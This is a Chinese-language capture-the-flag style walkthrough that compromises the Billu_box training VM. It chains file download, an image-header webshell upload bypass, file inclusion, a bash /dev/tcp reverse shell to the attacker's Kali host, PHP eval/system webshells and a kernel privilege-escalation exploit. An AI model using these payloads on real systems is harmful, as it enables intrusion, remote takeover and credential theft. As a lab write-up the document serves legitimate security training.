渗透测试靶机之旅---Billu_box

一、前言

对于已经了解过web安全常规漏洞并且对这些常规漏洞在训练平台上已经实操过后，Billu_box靶机会是一个绝佳的训练基地，就像一句老话说的一样，听别人讲一百遍不如自己动手做一遍，于是带着菜鸡属性的自己，开始了这次靶机训练之旅。

二、前期的准备---环境搭建

链接：https://pan.baidu.com/s/18Bs9hl5qkbtKrwccGi57Kw
提取码：Disc

解压后可直接在VMware中打开使用，需要把网络连接设置成NAT模式

如果自己设置使用Kali进行扫描时，把Kali的网络连接也设置成NAT模式，操作起来更加的方便，不要把Kali设置成与自己网络本身网段不同的静态IP地址（多半情况下出现在自己在不同的地方进行了上网，如果在一个固定的地方可以忽略），使用Nmap扫描没有发现主机时多半是网络连接出现问题，可以仔细查看自己物理主机VMnet8适配器问题。

三、开始上手---信息收集

1.查看自己的网段

2.挖掘目标主机的IP地址并且扫描端口

除去三个设备的IP地址之外，剩余的两个IP地址中有一个是我们Kali的IP地址，我们可以很轻易发发现192.168.10.130是我们寻找的靶机的IP地址。

接下来我们扫描端口

我们可以很清楚的看到有两个端口是进行了开放，一个是22端口对应的是SSH协议一个是80端口对应的是http协议，这就证明我们可以在网页上对其进行访问

四、开始实操

方法一：

打开之后会发现是一个白胡子的界面(看过海贼的应该都知道，但是我没看过0.0)

观察界面我们可以看到有一个用户名的输入和密码的输入，并且明确的表明"Show me your SQLI skills",想注他但是我忍了，mysql注入有时候有太多的不确定因素了，所以我选择先扫描一下网站的目录。

可以看到在这个网站下的文件还是挺多的，挨个访问扫描出来的文件，在访问到test.php的时候，看到了这句话

大致意思为可以对file进行传参，尝试了一下GET方式发现页面没有变化，于是尝试POST传参，发现这个是一个任意文件下载漏洞，在下载了几个文件之后，在c.php中看到了数据库的用户名和密码于是在phpmy界面进行了登录

成功进入

发现这里一共有两个数据库，除去一个我们大家都熟知的系统数据库外，还有一个ica_lab数据库，在这个数据库的auth表中有uname和pass字段，于是大胆猜测是大胡子界面登录的用户名和密码，进行尝试，发现也成功登录

进来之后发现是一个文件上传的内容，尝试着上传php文件，但是提示说只允许上传.jpg、.png和.gif文件

当上传了一个更改文件名后的一句话木马时，页面也提示我们上传失败

于是猜想他可能是对内容图片头进行了检测，通过制作图片马来进行验证绕过，看是否能上传成功

图片马的制作方法：copy 图片.jpg/b + 木马.php/a 木马.jpg

/b 表示以二进制方式打开
/a 表示以ASCII方式打

发现可以上传成功

但是不管使用蚁剑还是菜刀都无法连接上，于是抓包看一下此界面传输数据的方式

原来如此为POST模式，因为我们知道不管是菜刀还是蚁剑都只能连接以GET方式传递的界面而POST方式传递的者无法连接，只能另换思路。

此时忽然想起我们有一个随意文件下载的test界面于是，下载下来此界面来审计一下源代码

不看不知道，一看吓一跳呀，明显的文件包含漏洞而且不带有任何过滤的。

于是有了新思路，利用图片马先上传在利用的方式来进行命令执行攻击，先检查一下看能否使用

发现完全可以使用，此时我们就可以来使用反弹shell了，上shell

system('echo "bash -i >& /dev/tcp/192.168.10.132/1234 0>&1" | bash');

在kali当中使用nc来连接

nc -lvvp 1234

我们通过a参数传入的shell一定要进行URL编码不然会出现错误，在使用bp进行发送时一定要在Repeater模块中进行多次重发，因为我们使用nc连接不可能一次性连接成功，反弹shell的过程就相当于我们物理机上的bp在kali当中接管了我们的进程

反弹成功(反弹shell的原理与菜刀一样)

接下来的步骤应该就是要提权，拿权限然后进入root用户了，但是在phpmy的配置文件config.inc.php中看到了一个用户名和密码

本来以为是数据库登录的用户名和密码但是想到前边我们已经可以登录进去phpmy之后，于是猜想是靶机的登录用户和密码，在前面知道开着SSH协议所以连接一下进行查看，发现可以登录进去

方法二：

在结合到我们方法一中的方式，靶机的登录用户和登录密码在phpmy的配置文件config.inc.php当中，而且我们有一个随意文件下载的界面，在结合着

phpmy在linux下的位置(/var/www)，我们可以直接把config.inc.php文件下载下来，测试一下

打开文件夹，我们也可以看到靶机的登录用户名和密码（但是这种方法及其不推荐，因为config.inc.php当中一般存放的为数据库的登录用户名和密码，而不会是一台服务器的用户名和密码，在这里只是碰巧）。

方法三：

前边和方法一一致，在菜刀连接的时候不同，查找一个可以写的文件来在该文件当中写入一个一句话木马

先查看那个文件具有写的权限使用命令ls -la;(需要进行URL编码)【注意：此处为了方便，我又上传了一个文件内容为

GIF89A
<?php system($_GET['cmd']);?>

的图片马，不用像第一步当中在使用system()函数，当然第一步当中也可以直接使用这个图片马，eval()函数和system()函数的区别

【eval()函数：是进行代码执行的函数，在里边的内容只要符合PHP语法的要求就可以被执行，在结束时必须要用";"

system()函数：是进行命令执行的函数而不是代码执行

】

我们使用ls -la发现uploaded_images文件我们具有写的权限

我们通过文件包含漏洞在burp或者max hackbar向里边写一个木马文件（一定要进行URL转码！！！URL转码！！！URL转码！！！重要的事情说三遍）

echo '<?php @eval($_POST['a']);?>' >> uploaded_images/wq.php

写入之后我们可以使用cat uploaded_images/wq.php(也要记得进行编码)查看一下，可以发现我们已经成功的写入

此时就可以使用菜刀进行连接了

成功连接

提权

接下来就是提权了

cat /etc/issue和uname -a
查看系统的版本信息和内核为：Ubuntu 12.04.5 LTS、Linux indishell 3.13.0-32-generic

在kali的searchsploit（漏洞数据库）中搜索这个系统版本的漏洞**

searchsploit Ubuntu 12.04

选择相应的linux版本，将exp拷贝下来(拷贝的位置随意)

cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/

把文件拉到物理机桌面上，然后通过菜刀上传到billu_box当中

因为个人习惯问题还是比较喜欢在kali当中进行操作，所以反弹shell到kali当中【反弹shell方法在方法一中】，其实在菜刀或者蚁剑的虚拟终端当中也可以进行操作。

反弹shell成功

对其进行提升权限和编译，但是发现编译之后并不是我们赋予的77权限，又尝试了几次发现提升权限的步骤可以省略，没有用

执行exp文件

提权成功